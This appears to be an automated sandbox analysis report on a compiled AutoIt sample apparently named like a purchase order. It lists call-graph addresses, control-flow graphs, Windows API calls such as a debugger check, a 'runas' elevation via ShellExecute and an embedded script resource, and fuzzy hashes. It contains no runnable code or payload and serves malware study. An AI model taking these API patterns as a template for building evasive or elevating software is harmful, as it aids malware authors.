b73f2b 96520->96525 96528 b7ee75 48 API calls 96520->96528 96529 b66eed 48 API calls 96520->96529 96537 bd71e1 96520->96537 96541 b6d9a0 53 API calls __cinit 96520->96541 96542 b6d83d 53 API calls 96520->96542 96543 b7c15c 48 API calls 96520->96543 96544 b7becb 335 API calls 96520->96544 96550 b6dcae 50 API calls Mailbox 96520->96550 96551 bbccdc 48 API calls 96520->96551 96552 baa1eb 50 API calls 96520->96552 96563 bacc5c 86 API calls 4 library calls 96521->96563 96523->96520 96525->96468 96526 bd715f 96539 bd71a1 96526->96539 96554 bbccdc 48 API calls 96526->96554 96528->96520 96529->96520 96533 bd71ce 96534 b7c050 48 API calls 96533->96534 96535 bd71d6 96534->96535 96535->96537 96538 bd7313 96535->96538 96536 bd71ab 96536->96489 96536->96533 96537->96525 96562 bacc5c 86 API calls 4 library calls 96537->96562 96561 bacc5c 86 API calls 4 library calls 96538->96561 96555 b7c15c 48 API calls 96539->96555 96541->96520 96542->96520 96543->96520 96544->96520 96545->96525 96546->96479 96547->96473 96548->96520 96549->96525 96550->96520 96551->96520 96552->96520 96553->96526 96554->96526 96555->96536 96556->96496 96557->96525 96558->96509 96559->96525 96560->96525 96561->96525 96562->96525 96563->96525 96564->96525 96565->96525 96566->96525 96567->96486 96568 b6ef80 96569 b73b70 335 API calls 96568->96569 96570 b6ef8c 96569->96570 96571 bd19cb 96576 b62322 96571->96576 96573 bd19d1 96609 b80f0a 52 API calls __cinit 96573->96609 96575 bd19db 96577 b62344 96576->96577 96610 b626df 96577->96610 96582 b6d7f7 48 API calls 96583 b62384 96582->96583 96584 b6d7f7 48 API calls 96583->96584 96585 b6238e 96584->96585 96586 b6d7f7 48 API calls 96585->96586 96587 b62398 96586->96587 96588 b6d7f7 48 API calls 96587->96588 96589 b623de 96588->96589 96590 b6d7f7 48 API calls 96589->96590 96591 b624c1 96590->96591 96618 b6263f 96591->96618 96595 b624f1 96596 b6d7f7 48 API calls 96595->96596 96597 b624fb 96596->96597 96647 b62745 96597->96647 96599 b62546 96600 b62556 GetStdHandle 96599->96600 96601 bd501d 96600->96601 96602 b625b1 96600->96602 96601->96602 96604 bd5026 96601->96604 96603 b625b7 CoInitialize 96602->96603 96603->96573 96654 ba92d4 53 API calls 96604->96654 96606 bd502d 96655 ba99f9 CreateThread 96606->96655 96608 bd5039 CloseHandle 96608->96603 96609->96575 96656 b62854 96610->96656 96613 b66a63 48 API calls 96614 b6234a 96613->96614 96615 b6272e 96614->96615 96670 b627ec 6 API calls 96615->96670 96617 b6237a 96617->96582 96619 b6d7f7 48 API calls 96618->96619 96620 b6264f 96619->96620 96621 b6d7f7 48 API calls 96620->96621 96622 b62657 96621->96622 96671 b626a7 96622->96671 96625 b626a7 48 API calls 96626 b62667 96625->96626 96627 b6d7f7 48 API calls 96626->96627 96628 b62672 96627->96628 96629 b7f4ea 48 API calls 96628->96629 96630 b624cb 96629->96630 96631 b622a4 96630->96631 96632 b622b2 96631->96632 96633 b6d7f7 48 API calls 96632->96633 96634 b622bd 96633->96634 96635 b6d7f7 48 API calls 96634->96635 96636 b622c8 96635->96636 96637 b6d7f7 48 API calls 96636->96637 96638 b622d3 96637->96638 96639 b6d7f7 48 API calls 96638->96639 96640 b622de 96639->96640 96641 b626a7 48 API calls 96640->96641 96642 b622e9 96641->96642 96643 b7f4ea 48 API calls 96642->96643 96644 b622f0 96643->96644 96645 bd1fe7 96644->96645 96646 b622f9 RegisterWindowMessageW 96644->96646 96646->96595 96648 bd5f4d 96647->96648 96649 b62755 96647->96649 96676 bac942 50 API calls 96648->96676 96651 b7f4ea 48 API calls 96649->96651 96652 b6275d 96651->96652 96652->96599 96653 bd5f58 96654->96606 96655->96608 96677 ba99df 54 API calls 96655->96677 96663 b62870 96656->96663 96659 b62870 48 API calls 96660 b62864 96659->96660 96661 b6d7f7 48 API calls 96660->96661 96662 b62716 96661->96662 96662->96613 96664 b6d7f7 48 API calls 96663->96664 96665 b6287b 96664->96665 96666 b6d7f7 48 API calls 96665->96666 96667 b62883 96666->96667 96668 b6d7f7 48 API calls 96667->96668 96669 b6285c 96668->96669 96669->96659 96670->96617 96672 b6d7f7 48 API calls 96671->96672 96673 b626b0 96672->96673 96674 b6d7f7 48 API calls 96673->96674 96675 b6265f 96674->96675 96675->96625 96676->96653 96678 bd197b 96683 b7dd94 96678->96683 96682 bd198a 96684 b7f4ea 48 API calls 96683->96684 96685 b7dd9c 96684->96685 96686 b7ddb0 96685->96686 96691 b7df3d 96685->96691 96690 b80f0a 52 API calls __cinit 96686->96690 96690->96682 96692 b7df46 96691->96692 96693 b7dda8 96691->96693 96723 b80f0a 52 API calls __cinit 96692->96723 96695 b7ddc0 96693->96695 96696 b6d7f7 48 API calls 96695->96696 96697 b7ddd7 GetVersionExW 96696->96697 96698 b66a63 48 API calls 96697->96698 96699 b7de1a 96698->96699 96724 b7dfb4 96699->96724 96702 b66571 48 API calls 96706 b7de2e 96702->96706 96705 bd24c8 96706->96705 96728 b7df77 96706->96728 96707 b7debb 96710 b7dee3 96707->96710 96711 b7df31 GetSystemInfo 96707->96711 96708 b7dea4 GetCurrentProcess 96737 b7df5f LoadLibraryA GetProcAddress 96708->96737 96731 b7e00c 96710->96731 96712 b7df0e 96711->96712 96714 b7df21 96712->96714 96715 b7df1c FreeLibrary 96712->96715 96714->96686 96715->96714 96717 b7df29 GetSystemInfo 96719 b7df03 96717->96719 96718 b7def9 96734 b7dff4 96718->96734 96719->96712 96721 b7df09 FreeLibrary 96719->96721 96721->96712 96723->96693 96725 b7dfbd 96724->96725 96726 b6b18b 48 API calls 96725->96726 96727 b7de22 96726->96727 96727->96702 96738 b7df89 96728->96738 96742 b7e01e 96731->96742 96735 b7e00c 2 API calls 96734->96735 96736 b7df01 GetNativeSystemInfo 96735->96736 96736->96719 96737->96707 96739 b7dea0 96738->96739 96740 b7df92 LoadLibraryA 96738->96740 96739->96707 96739->96708 96740->96739 96741 b7dfa3 GetProcAddress 96740->96741 96741->96739 96743 b7def1 96742->96743 96744 b7e027 LoadLibraryA 96742->96744 96743->96717 96743->96718 96744->96743 96745 b7e038 GetProcAddress 96744->96745 96745->96743 96746 bd19ba 96751 b7c75a 96746->96751 96750 bd19c9 96752 b6d7f7 48 API calls 96751->96752 96753 b7c7c8 96752->96753 96759 b7d26c 96753->96759 96755 b7c865 96756 b7c881 96755->96756 96762 b7d1fa 48 API calls _memcpy_s 96755->96762 96758 b80f0a 52 API calls __cinit 96756->96758 96758->96750 96763 b7d298 96759->96763 96762->96755 96764 b7d28b 96763->96764 96765 b7d2a5 96763->96765 96764->96755 96765->96764 96766 b7d2ac RegOpenKeyExW 96765->96766 96766->96764 96767 b7d2c6 RegQueryValueExW 96766->96767 96768 b7d2fc RegCloseKey 96767->96768 96769 b7d2e7 96767->96769 96768->96764 96769->96768 96770 bd9c06 96781 b7d3be 96770->96781 96772 bd9c1c 96780 bd9c91 Mailbox 96772->96780 96790 b61caa 49 API calls 96772->96790 96774 b73200 335 API calls 96775 bd9cc5 96774->96775 96778 bda7ab Mailbox 96775->96778 96792 bacc5c 86 API calls 4 library calls 96775->96792 96777 bd9c71 96777->96775 96791 bab171 48 API calls 96777->96791 96780->96774 96782 b7d3dc 96781->96782 96783 b7d3ca 96781->96783 96785 b7d3e2 96782->96785 96786 b7d40b 96782->96786 96793 b6dcae 50 API calls Mailbox 96783->96793 96788 b7f4ea 48 API calls 96785->96788 96794 b6dcae 50 API calls Mailbox 96786->96794 96789 b7d3d4 96788->96789 96789->96772 96790->96777 96791->96780 96792->96778 96793->96789 96794->96789 96795 b7221a 96796 b7271e 96795->96796 96797 b72223 96795->96797 96805 b71eba Mailbox 96796->96805 96815 b9a58f 48 API calls _memcpy_s 96796->96815 96797->96796 96798 b6936c 81 API calls 96797->96798 96799 b7224e 96798->96799 96799->96796 96800 b7225e 96799->96800 96806 b6b384 96800->96806 96803 bdbe8a 96804 b66eed 48 API calls 96803->96804 96804->96805 96807 b6b392 96806->96807 96812 b6b3c5 _memcpy_s 96806->96812 96808 b6b3fd 96807->96808 96809 b6b3b8 96807->96809 96807->96812 96811 b7f4ea 48 API calls 96808->96811 96810 b6bb85 48 API calls 96809->96810 96810->96812 96813 b6b407 96811->96813 96812->96805 96814 b7f4ea 48 API calls 96813->96814 96814->96812 96815->96803

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 856 b8b043-b8b080 call b8f8a0 859 b8b089-b8b08b 856->859 860 b8b082-b8b084 856->860 862 b8b0ac-b8b0d9 859->862 863 b8b08d-b8b0a7 call b87bda call b87c0e call b86e10 859->863 861 b8b860-b8b86c call b8a70c 860->861 865 b8b0db-b8b0de 862->865 866 b8b0e0-b8b0e7 862->866 863->861 865->866 869 b8b10b-b8b110 865->869 870 b8b0e9-b8b100 call b87bda call b87c0e call b86e10 866->870 871 b8b105 866->871 874 b8b11f-b8b12d call b93bf2 869->874 875 b8b112-b8b11c call b8f82f 869->875 899 b8b851-b8b854 870->899 871->869 886 b8b44b-b8b45d 874->886 887 b8b133-b8b145 874->887 875->874 890 b8b7b8-b8b7d5 WriteFile 886->890 891 b8b463-b8b473 886->891 887->886 889 b8b14b-b8b183 call b87a0d GetConsoleMode 887->889 889->886 912 b8b189-b8b18f 889->912 893 b8b7e1-b8b7e7 GetLastError 890->893 894 b8b7d7-b8b7df 890->894 896 b8b479-b8b484 891->896 897 b8b55a-b8b55f 891->897 900 b8b7e9 893->900 894->900 904 b8b48a-b8b49a 896->904 905 b8b81b-b8b833 896->905 901 b8b663-b8b66e 897->901 902 b8b565-b8b56e 897->902 911 b8b85e-b8b85f 899->911 909 b8b7ef-b8b7f1 900->909 901->905 908 b8b674 901->908 902->905 910 b8b574 902->910 913 b8b4a0-b8b4a3 904->913 906 b8b83e-b8b84e call b87c0e call b87bda 905->906 907 b8b835-b8b838 905->907 906->899 907->906 914 b8b83a-b8b83c 907->914 915 b8b67e-b8b693 908->915 917 b8b7f3-b8b7f5 909->917 918 b8b856-b8b85c 909->918 919 b8b57e-b8b595 910->919 911->861 920 b8b199-b8b1bc GetConsoleCP 912->920 921 b8b191-b8b193 912->921 922 b8b4e9-b8b520 WriteFile 913->922 923 b8b4a5-b8b4be 913->923 914->911 927 b8b699-b8b69b 915->927 917->905 929 b8b7f7-b8b7fc 917->929 918->911 930 b8b59b-b8b59e 919->930 931 b8b440-b8b446 920->931 932 b8b1c2-b8b1ca 920->932 921->886 921->920 922->893 926 b8b526-b8b538 922->926 924 b8b4cb-b8b4e7 923->924 925 b8b4c0-b8b4ca 923->925 924->913 924->922 925->924 926->909 934 b8b53e-b8b54f 926->934 935 b8b6d8-b8b719 WideCharToMultiByte 927->935 936 b8b69d-b8b6b3 927->936 938 b8b7fe-b8b810 call b87c0e call b87bda 929->938 939 b8b812-b8b819 call b87bed 929->939 940 b8b5de-b8b627 WriteFile 930->940 941 b8b5a0-b8b5b6 930->941 931->917 933 b8b1d4-b8b1d6 932->933 942 b8b36b-b8b36e 933->942 943 b8b1dc-b8b1fe 933->943 934->904 944 b8b555 934->944 935->893 948 b8b71f-b8b721 935->948 945 b8b6b5-b8b6c4 936->945 946 b8b6c7-b8b6d6 936->946 938->899 939->899 940->893 953 b8b62d-b8b645 940->953 950 b8b5b8-b8b5ca 941->950 951 b8b5cd-b8b5dc 941->951 958 b8b370-b8b373 942->958 959 b8b375-b8b3a2 942->959 956 b8b200-b8b215 943->956 957 b8b217-b8b223 call b81688 943->957 944->909 945->946 946->927 946->935 960 b8b727-b8b75a WriteFile 948->960 950->951 951->930 951->940 953->909 955 b8b64b-b8b658 953->955 955->919 962 b8b65e 955->962 963 b8b271-b8b283 call b940f7 956->963 977 b8b269-b8b26b 957->977 978 b8b225-b8b239 957->978 958->959 965 b8b3a8-b8b3ab 958->965 959->965 966 b8b77a-b8b78e GetLastError 960->966 967 b8b75c-b8b776 960->967 962->909 987 b8b289 963->987 988 b8b435-b8b43b 963->988 970 b8b3ad-b8b3b0 965->970 971 b8b3b2-b8b3c5 call b95884 965->971 975 b8b794-b8b796 966->975 967->960 973 b8b778 967->973 970->971 979 b8b407-b8b40a 970->979 971->893 991 b8b3cb-b8b3d5 971->991 973->975 975->900 976 b8b798-b8b7b0 975->976 976->915 982 b8b7b6 976->982 977->963 984 b8b23f-b8b254 call b940f7 978->984 985 b8b412-b8b42d 978->985 979->933 983 b8b410 979->983 982->909 983->988 984->988 998 b8b25a-b8b267 984->998 985->988 989 b8b28f-b8b2c4 WideCharToMultiByte 987->989 988->900 989->988 994 b8b2ca-b8b2f0 WriteFile 989->994 992 b8b3fb-b8b401 991->992 993 b8b3d7-b8b3ee call b95884 991->993 992->979 993->893 1001 b8b3f4-b8b3f5 993->1001 994->893 997 b8b2f6-b8b30e 994->997 997->988 1000 b8b314-b8b31b 997->1000 998->989 1000->992 1002 b8b321-b8b34c WriteFile 1000->1002 1001->992 1002->893 1003 b8b352-b8b359 1002->1003 1003->988 1004 b8b35f-b8b366 1003->1004 1004->992
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                                                        • Instruction ID: d126ee662214a208baa6440b7436d5b2d2ed625f81b75445ed34cb75b9628399
                                                                                        • Opcode Fuzzy Hash: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                                                        • Instruction Fuzzy Hash: D9325F75B022188FDB24AF24DC81AE9B7F5FF46310F1841D9E40AA7A61D7709E81CF52

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
                                                                                          • Part of subcall function 00B66430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B63DEE,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00B66471
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C128F4,00000010), ref: 00BD1CCE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D06
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BFDAB4,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D89
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00B63AA3), ref: 00BD1D90
                                                                                          • Part of subcall function 00B63E6E: GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                                                          • Part of subcall function 00B63E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(00000063), ref: 00B63E9E
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                                                          • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                                                          • Part of subcall function 00B63E6E: RegisterClassExW.USER32(?), ref: 00B63F30
                                                                                          • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                                                          • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                                                          • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                                                          • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                                                          • Part of subcall function 00B64FFC: _memset.LIBCMT ref: 00B65022
                                                                                          • Part of subcall function 00B64FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B650CB
                                                                                        Strings
                                                                                        • runas, xrefs: 00BD1D84
                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00BD1CC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 438480954-3287110873
                                                                                        • Opcode ID: 69239acbc4d6ef3df0bdacf81f80cb8f1d2e627744fea6f3d25bba50012f3deb
                                                                                        • Instruction ID: b547a9a8023fddc0958caff7393bbc3ede8217c7d61b4e3bc2e85095f3e4bbe9
                                                                                        • Opcode Fuzzy Hash: 69239acbc4d6ef3df0bdacf81f80cb8f1d2e627744fea6f3d25bba50012f3deb
                                                                                        • Instruction Fuzzy Hash: FF51D631A04288BACF21ABB4DC41FED7BF5DF25B00F0441E5F95267192DA794A568B31

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1288 b7ddc0-b7de4f call b6d7f7 GetVersionExW call b66a63 call b7dfb4 call b66571 1297 b7de55-b7de56 1288->1297 1298 bd24c8-bd24cb 1288->1298 1301 b7de92-b7dea2 call b7df77 1297->1301 1302 b7de58-b7de63 1297->1302 1299 bd24cd 1298->1299 1300 bd24e4-bd24e8 1298->1300 1304 bd24d0 1299->1304 1305 bd24ea-bd24f3 1300->1305 1306 bd24d3-bd24dc 1300->1306 1315 b7dec7-b7dee1 1301->1315 1316 b7dea4-b7dec1 GetCurrentProcess call b7df5f 1301->1316 1307 bd244e-bd2454 1302->1307 1308 b7de69-b7de6b 1302->1308 1304->1306 1305->1304 1312 bd24f5-bd24f8 1305->1312 1306->1300 1310 bd245e-bd2464 1307->1310 1311 bd2456-bd2459 1307->1311 1313 bd2469-bd2475 1308->1313 1314 b7de71-b7de74 1308->1314 1310->1301 1311->1301 1312->1306 1317 bd247f-bd2485 1313->1317 1318 bd2477-bd247a 1313->1318 1319 bd2495-bd2498 1314->1319 1320 b7de7a-b7de89 1314->1320 1322 b7dee3-b7def7 call b7e00c 1315->1322 1323 b7df31-b7df3b GetSystemInfo 1315->1323 1316->1315 1339 b7dec3 1316->1339 1317->1301 1318->1301 1319->1301 1324 bd249e-bd24b3 1319->1324 1325 bd248a-bd2490 1320->1325 1326 b7de8f 1320->1326 1336 b7df29-b7df2f GetSystemInfo 1322->1336 1337 b7def9-b7df01 call b7dff4 GetNativeSystemInfo 1322->1337 1330 b7df0e-b7df1a 1323->1330 1327 bd24bd-bd24c3 1324->1327 1328 bd24b5-bd24b8 1324->1328 1325->1301 1326->1301 1327->1301 1328->1301 1332 b7df21-b7df26 1330->1332 1333 b7df1c-b7df1f FreeLibrary 1330->1333 1333->1332 1338 b7df03-b7df07 1336->1338 1337->1338 1338->1330 1341 b7df09-b7df0c FreeLibrary 1338->1341 1339->1315 1341->1330
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00B7DDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00BFDC38,?,?), ref: 00B7DEAC
                                                                                        • GetNativeSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF1F
                                                                                        • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF29
                                                                                        • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3851250370-0
                                                                                        • Opcode ID: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                                                        • Instruction ID: 8c0d1f828289e17502849d8604ffed0da2acda24c20ccffa21ba767aa43983ac
                                                                                        • Opcode Fuzzy Hash: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                                                        • Instruction Fuzzy Hash: 4E618DB180A2C4CBCF16CF6898C15E9BFF4AF39300B1989D9D8599F347D6248909CB66

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1360 b6406b-b64083 CreateStreamOnHGlobal 1361 b64085-b6409c FindResourceExW 1360->1361 1362 b640a3-b640a6 1360->1362 1363 b640a2 1361->1363 1364 bd4f16-bd4f25 LoadResource 1361->1364 1363->1362 1364->1363 1365 bd4f2b-bd4f39 SizeofResource 1364->1365 1365->1363 1366 bd4f3f-bd4f4a LockResource 1365->1366 1366->1363 1367 bd4f50-bd4f6e 1366->1367 1367->1363
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B6449E,?,?,00000000,00000001), ref: 00B6407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B6449E,?,?,00000000,00000001), ref: 00B64092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F2F
                                                                                        • LockResource.KERNEL32(00B6449E,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB,00000000), ref: 00BD4F42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                                                        • Instruction ID: e264ebba4fa03aca024decbc00995aa9dfb916e73c83654ba07d7ecdf3cf5172
                                                                                        • Opcode Fuzzy Hash: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                                                        • Instruction Fuzzy Hash: 77112E71200751AFE7218B66EC88F677BB9EBC5B51F14456CF6129B2A0DBB1DC448A20
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,00BD2F49), ref: 00BA6CB9
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA6CCA
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA6CDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                        • String ID:
                                                                                        • API String ID: 48322524-0
                                                                                        • Opcode ID: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                                                        • Instruction ID: adfccac427a2c2e09ae4e28af24420087aee63cf0f9460e6f958c48adbda2ab8
                                                                                        • Opcode Fuzzy Hash: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                                                        • Instruction Fuzzy Hash: 75E0DF71818410AB82206738EC8D8EA37ACEE06339F10074AF872D21E0FBB0ED1096D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throwstd::exception::exception
                                                                                        • String ID: @
                                                                                        • API String ID: 3728558374-2766056989
                                                                                        • Opcode ID: 278e21b11ae6573eddfa30dd875f2974baa7cbd882d42af64d4cc3d227d3f139
                                                                                        • Instruction ID: 285d465436c9fd9a6c8319dfc7ba772e3f8e8ae0371f2e2d1c650c41ce978b0c
                                                                                        • Opcode Fuzzy Hash: 278e21b11ae6573eddfa30dd875f2974baa7cbd882d42af64d4cc3d227d3f139
                                                                                        • Instruction Fuzzy Hash: 0672AF70E042099FCB24DF58C481ABEB7F5EF48700F14C09AE929AB351EB75AE45DB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
